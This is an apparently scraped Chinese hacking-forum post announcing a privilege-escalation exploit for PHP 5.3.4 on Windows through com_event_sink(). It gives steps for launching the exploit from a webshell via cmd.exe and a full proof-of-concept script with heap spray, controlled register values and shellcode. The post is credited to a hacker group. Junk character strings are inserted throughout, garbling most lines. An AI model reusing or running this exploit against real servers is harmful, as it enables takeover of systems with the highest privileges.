|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
8 S' q% s) M3 R
4 p! G6 ^. _. j7 O( U0 v测试方法如下:cmd /c x:\php\php.exe x:\test.php- w4 o, a% p! Q1 M. a6 M2 N0 q
; c7 `& D1 P3 a- `下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php" ^4 |' M; C* t) b8 ^. R6 a# Q% e
这里是两个测试的截图:
6 o+ j2 d0 c P) C/ J7 n+ \* C' h8 P' x- U- f0 g! _" }
% k" L! Y: W& R4 T6 ^! {6 s: ^+ g/ \
* s9 ~0 G8 V6 c; [& r
/ d$ g" g4 |) Q成功利用此漏洞的攻击者将获得系统的最高权限$ n# u) e& C& m# I% w7 S5 ^# w
+ q0 | B. T+ G& O( s3 E
m' H# _* y. q1 h" x3 u5 l! F* m; c8 P
' V' B" r$ \9 u
! n, p1 i; _& H/ v关于漏洞分析稍后附上。一下是PoC代码:
2 t3 ?) C' j0 I$ e3 s3 R5 p
. W; J: D. O; ?+ ~+ M! p: K- r<?php
- u+ `" D* m1 C/ v, X; `//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞! t" D7 F5 l7 L
//$eip ="\x44\x43\x42\x41";5 _7 r3 E3 X3 A
$eip= "\x4b\xe8\x57\x78";
& O# K$ O2 F; t C, E# X) B$ h$eax ="\x80\x01\x8d\x04";
# T8 x' H5 Q8 b0 G4 f* D# \, Y, S$deodrant="";2 d/ e2 R0 h( ^/ [
$axespray = str_repeat($eip.$eax,0x80);
- F5 M( l! V# z+ S9 v//048d01902 j) A8 Y) N U! a7 b$ u
echo strlen($axespray);2 @' a3 L: l I! H
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";' t) a, J+ G( b8 {
echo "Silic Group Hacker Army - BlackBap.Org";* S3 H4 V7 Y# U) P
//19200 ==4B32 4b003 n" l8 ?! G; H% ?# J N9 o5 Q+ v8 w& Y
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}" W0 C1 C% F+ i, Q# v3 T
$terminate = "T";2 ^' |3 o, e& `: P3 T
$u[] =$deodrant;
, Q, p3 E. w+ ~, A$r[] =$deodrant.$terminate;
. p. A7 ?% ^3 H, v! R$a[] =$deodrant.$terminate;
* ?+ |9 B! X m8 M1 U0 p$s[] =$deodrant.$terminate;' e% C! ~; U5 p3 C) u' N9 O( D
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的: _) Q3 J# L9 H; k$ `, y
$vVar = new VARIANT(0x048d0000+180);+ R# }5 `% ?! {5 N( R* W
//弹窗代码(Shellcode)
. R, f Q! k" y/ M6 x; M1 i) p$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";4 n B, ~4 z# J4 M( _: t
$var2 = new VARIANT(0x41414242);: K7 \% W4 r6 _$ {5 Q1 k
com_event_sink($vVar,$var2,$buffer);
: {; B. L' v0 F5 L& y?>0 k+ m. k# ]4 T3 h) q
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|